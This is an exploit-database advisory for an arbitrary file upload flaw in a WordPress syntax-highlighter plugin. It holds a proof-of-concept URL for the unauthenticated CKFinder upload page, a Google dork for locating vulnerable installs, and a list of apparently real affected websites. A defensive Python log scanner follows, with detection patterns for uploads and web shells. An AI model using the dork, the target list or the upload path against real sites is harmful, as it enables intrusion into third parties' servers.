WordPress CK-And-SyntaxHighLighter Arbitrary File Upload

2014.08.13
Credit: Hekt0r
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

[+] Title: Wordpress ck-and-syntaxhighlighter Plugin RFU vulnerability
[+] Date: 2014-08-12
[+] Author: Hekt0r
[+] Tested on: Windows7 & Kali Linux
[+] Vendor Homepage: http://wordpress.org/
[+] Software Link: http://wordpress.org/plugins/ck-and-syntaxhighlighter/
[+] Dork : inurl:/wp-content/plugins/ck-and-syntaxhighlighter/

### POC:
http://localhost/wordpress/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
[+] File Uploaded: http://localhost/wordpress/wp-content/uploads/ckfinder/files/file.txt

### Demo:
http://www.tourXgueniev.fr/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
http://www.neiXhuecc.org/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
http://blog.itXacm.cn/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html

### Credits:
[+] Special Thanks: Root SmasheR, Mr.Moein, UmPire, Qzz, Ali Ahmady, Saeed.Jok3r M4hdi, Vahid H±cĸer, BlackErroR, Phantom.S3c And All members of Iran Security Group
[+] iransec.net
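As an added defensive example (not part of the advisory), a small Python scanner that flags web-server access-log lines touching the plugin's bundled CKFinder path named in the PoC, or fetching a script from the upload directory the advisory names. The log lines are constructed, the Combined Log Format layout is assumed, and the connector path and `shell.php` name in the sample are illustrative, not taken from the advisory.

```python
import re
from typing import Dict, List, Optional

# Paths taken from the advisory: the exposed CKFinder UI and the upload directory.
CKFINDER_PATH = "/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/"
UPLOAD_PATH = "/wp-content/uploads/ckfinder/files/"
# Extensions that should never be served from an upload directory (assumes a PHP host).
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)(\.|$)", re.IGNORECASE)

# Combined Log Format (assumed Apache/nginx default layout).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r"(?P<status>\d{3}) \S+"
)


def classify(line: str) -> Optional[Dict[str, str]]:
    """Return a finding for one access-log line, or None if it looks benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m.group("path").split("?", 1)[0]  # drop the query string
    reason = None
    if path.startswith(CKFINDER_PATH):
        # The bundled file manager sits outside WordPress authentication, so any hit
        # is worth reviewing; a POST to it is an upload attempt.
        reason = "ckfinder-upload" if m.group("method") == "POST" else "ckfinder-access"
    elif path.startswith(UPLOAD_PATH) and SCRIPT_EXT.search(path):
        # A script fetched from the upload directory suggests a web shell has landed.
        reason = "script-in-uploads"
    if reason is None:
        return None
    return {"ip": m.group("ip"), "path": path, "status": m.group("status"), "reason": reason}


def scan(lines: List[str]) -> List[Dict[str, str]]:
    """Run classify() over a log and keep only the findings."""
    return [f for f in (classify(line) for line in lines) if f]


# Constructed sample log lines (not real traffic); connector path and shell.php are illustrative.
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Aug/2014:10:01:02 +0000] "GET /wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html HTTP/1.1" 200 5120',
    '203.0.113.5 - - [12/Aug/2014:10:01:09 +0000] "POST /wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/core/connector/php/connector.php?command=FileUpload HTTP/1.1" 200 87',
    '203.0.113.5 - - [12/Aug/2014:10:01:15 +0000] "GET /wp-content/uploads/ckfinder/files/shell.php HTTP/1.1" 200 310',
    '198.51.100.7 - - [12/Aug/2014:10:02:00 +0000] "GET /wp-content/uploads/ckfinder/files/file.txt HTTP/1.1" 200 12',
    '198.51.100.7 - - [12/Aug/2014:10:02:30 +0000] "GET /index.php HTTP/1.1" 200 9001',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The plain `file.txt` download is deliberately not flagged: only hits on the file manager itself and script fetches from the upload directory are reported.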


Copyright 2024, cxsecurity.com
